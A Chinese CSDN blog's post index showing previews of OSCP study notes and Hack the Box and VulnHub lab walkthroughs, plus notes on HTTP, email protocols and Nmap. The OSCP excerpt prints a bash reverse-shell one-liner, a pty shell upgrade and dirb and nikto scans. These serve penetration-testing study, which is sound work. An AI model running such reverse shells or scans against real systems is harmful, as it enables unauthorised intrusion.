- 博客(31)
- 收藏
- 关注
原创 OSCP学习笔记总结(本资料禁止转载)
OSCP学习笔记第零章实战学习反弹shell bash -i >&/dev/tcp/192.168.1.1/4444 0>&1切换交互式shell python -c 'import pty;pty.spawn("/bin/sh")'查看系统型号:lab_release -a查看系统版本:uname -a查看目标主机网页内容:dirb http://192.168.1.1:80查看网页漏洞:nikto -h 192.168.1.1 --useprox.
2021-10-19 18:05:10 11074 3
原创 HTTP学习笔记
一、HTTP简介 维基百科上解释为:超文本传输协议(英文:HyperText Transfer Protocol,缩写:HTTP)是一种用于分布式、协作式和超媒体信息系统的应用层协议。HTTP是万维网的数据通信的基础。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法。通过HTTP或者HTTPS协议请求的资源由统一资源标识符(Uniform Resource Identifiers,URI)来标识。二、HTTP发展历程HTTP/0.9版本,这个时候的HTTP只支持GE...
2022-03-14 17:30:46 3297
原创 OSCP历程
今天1点40,我收到了offensive发的邮件,通知我通过了oscp考试!现在总结下吧。1、笔记很重要,教材一定要看,很多细节都在教材里面,遇到新知识一定要记笔记,每做一台靶机,之后一定要写报告,把你渗透的过程,思路,记录下来。因为当时你觉得可能记住了,但是做了几十台到考试前时候你发现什么都记不住,这时候就需要过一遍你的靶机writeup来回忆相关知识点。2、官方靶机如果遇到不会的,没头绪的,可以上论坛,看看别人是怎么说的。如果一台靶机做了一天还是一点进展都没有,那就下一台吧,可能...
2021-12-08 00:12:22 1610 3
原创 Hack the Box Monitors 靶机渗透
Monitors靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-27请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集去80端口看看添加dnsecho "10.10.10.238 monitors.htb" >> /etc/hosts二、web渗透尝试wpscan,没token的可以去官网注册一个,
2021-07-27 23:13:17 516
原创 Hack the Box Seal 靶机渗透
Seal 靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-26请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集尝试访问8080端口,提示我们注册帐号,注册帐号后进入页面Deploy updated tomcat configuration.Disable manager and host-manager.从页面提示可以得.
2021-07-26 22:46:42 913 2
原创 Hack the Box Dynstr 靶机渗透
Dynstr 靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-25请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集查看80端口,发现是dns的机器,而且还有用户名密码先将dns写入hosts文件echo "10.10.10.244 dnsalias.htb dynamicdns.htb no-ip.htb dyna.h.
2021-07-26 01:20:06 612
原创 Hack the Box TheNotebook 靶机渗透
TheNotebook 靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-24请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集查看80端口home页面提示我们先注册,我们在register里注册信息注册成功,提示进入notes目录发现并没什么用,尝试抓包...
2021-07-25 20:26:25 278 2
原创 Hack the Box Love 靶机渗透
Love 靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-23请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集打开80端口发现登录页面,暂时不尝试爆破,打开https看看重新扫描443端口修改hosts文件指定这两个域名解析的IP为靶场的IP 10.10.10.239echo "10.10.10.239 love..
2021-07-23 23:21:58 360 1
原创 Hack the Box Cap 靶机渗透
Cap 靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-23请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集浏览器访问发现security snapshot 里面得值全为0,并且网址中data后数字还会递增,可能故意将真实数据隐藏,直接改成0尝试点击download,将下载下来得日志在wireshark中打开查看找.
2021-07-23 22:13:12 396
原创 Hack the Box Knife 靶机渗透
Knife靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-23请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集Nikto查看漏洞,发现php版本8.1.0查找是否有已知漏洞exploitPHP 8.1.0-dev版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通..
2021-07-23 10:26:19 293 1
原创 Hack the Box Armageddon 靶机渗透
Five86-1 靶机渗透目标:得到root权限作者:shadow时间:2021-04-09请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。————————————————版权声明:本文为CSDN博主「c2hhZG93」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/qq
2021-07-22 23:22:49 779
原创 VulnHub Five86-1 靶机渗透
Five86-1 靶机渗透目标:得到root权限作者:shadow时间:2021-04-09请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0主机ip为172.16.1.24nmap -p- -A -T5 172.16.1.24开启了80与22端口,看到nmap上面扫描到robots.t..
2021-04-09 16:47:50 352
原创 VulnHub DepthB2R 靶机渗透
DepthB2R 靶机渗透目标:得到root权限作者:shadow时间:2021-04-08请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集主机ip为172.16.1.22nmap -p- -A -T5 172.16.1.22只开放了8080端口,我们看看是什么二、web渗透没什么发现,试试nikto扫描下ni
2021-04-08 16:06:12 436
原创 OSCP pwnlab_init 靶机渗透
pwnlab_init 靶机渗透目标:得到root权限作者:shadow时间:2021-04-07请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0 pwnlab_init主机ip为172.16.1.20nmap -A -p- 172.16.1.20我们看到开启了80、3306等端口,登..
2021-04-07 19:48:20 476
原创 OSCP Raven 靶机渗透
Raven靶机渗透目标:得到root权限作者:shadow时间:2021-04-01请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0Raven主机ip为172.16.1.17nmap 查询开放端口nmap -p- -A 172.16.1.17查询到主机开放了80端口,打开浏览器看.
2021-04-01 18:27:02 335
原创 OSCP Brainpan 靶机渗透
Brainpan靶机渗透目标:得到root权限作者:shadow时间:2021-03-24请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0Brainpan主机ip为172.16.1.8然后我们nmap一下看看哪些端口是开放的nmap -p- -A 172.16.1.8只开放了9999.
2021-03-24 20:27:35 4986 6
原创 OSCP Sickos 1.1 靶机渗透
Sickos 1.1 靶机渗透目标:得到root权限作者:shadow时间:2021-03-23请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0Sickos 1.1主机ip为172.16.1.10nmap 扫描一下nmap -p- -A 172.16.1.10主机开放了代理服务器,
2021-03-23 18:54:07 343
原创 OSCP Lampiao 靶机渗透
Lampiao 靶机渗透目标:得到root权限作者:shadow时间:2021-03-22请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0Lampiao主机ip为172.16.1.15nmap扫下所有端口nmap -p- -A 172.16.1.15看下有两个http,看下80端口
2021-03-22 16:16:13 704
原创 OSCP GoldenEye 靶机渗透
GoldenEye 靶机渗透目标:得到root权限作者:shadow时间:2021-03-19请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0 GoldenEye主机ip为172.16.1.14nmap 端口扫描,发现开启的服务有smtp、http、pop3等等nmap -p- -A 172.
2021-03-19 19:19:15 1709 4
原创 IMAP、POP3、SMTP协议学习笔记
IMAP、POP3、SMTP协议学习笔记1、IMAP因特网报文存取协议IMAP(Internet Message Access Protocol)IMAP协议是由斯坦福大学的Mark Crispin教授在1986年开发的,后期版本是华盛顿州立大学进行开发的,IMAP4是TCP/IP协议族中的一员,现在的版本是“IMAP第四版第一次修订版”(IMAP4rev1)。IMAP4协议的特性IMAP4协议的默认端口:143IMAP4协议默认传输协议:TCP/IPIMAP4协议适...
2021-03-19 16:37:05 1725
转载 NMAP参数详解
NMAP参数详解目标选择单个扫描:nmap ip扫描主机:nmap www.XXXX.com扫描一系列IP:nmap 192.168.1.1-20扫描子网:nmap 192.168.1.1/20从文本文件获得扫描目标:nmap -iL list-of-ips.txt无ping扫描:常用于防火墙禁止ping的情况:nmap -P0 ip端口选择扫描单个端口:nmap -p 端口 ip扫描一系列端口:nmap -p 1-100 192.168.1.1扫描100个最常见
2021-03-17 17:07:13 3678 2
原创 OSCP IMF 靶机渗透
IMF 靶机渗透目标:得到root权限作者:shadow时间:2021-03-16请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0 imf主机ip为172.16.1.13然后我们nmap一下看看哪些端口是开放的nmap -p- -A 172.16.1.13主机只开放了80端口,登录浏览
2021-03-16 18:52:14 900 3
原创 OSCP Kioptrix Level2 靶机渗透
Kioptrix Level2 靶机渗透目标:得到root权限作者:shadow时间:2021-03-13请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集首先扫描靶机ipnetdiscover -i eth0 可见靶机ip为172.16.1.3nmap查看端口开放情况nmap -p- -A 172.16.1.3我们可以
2021-03-13 22:51:01 423
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人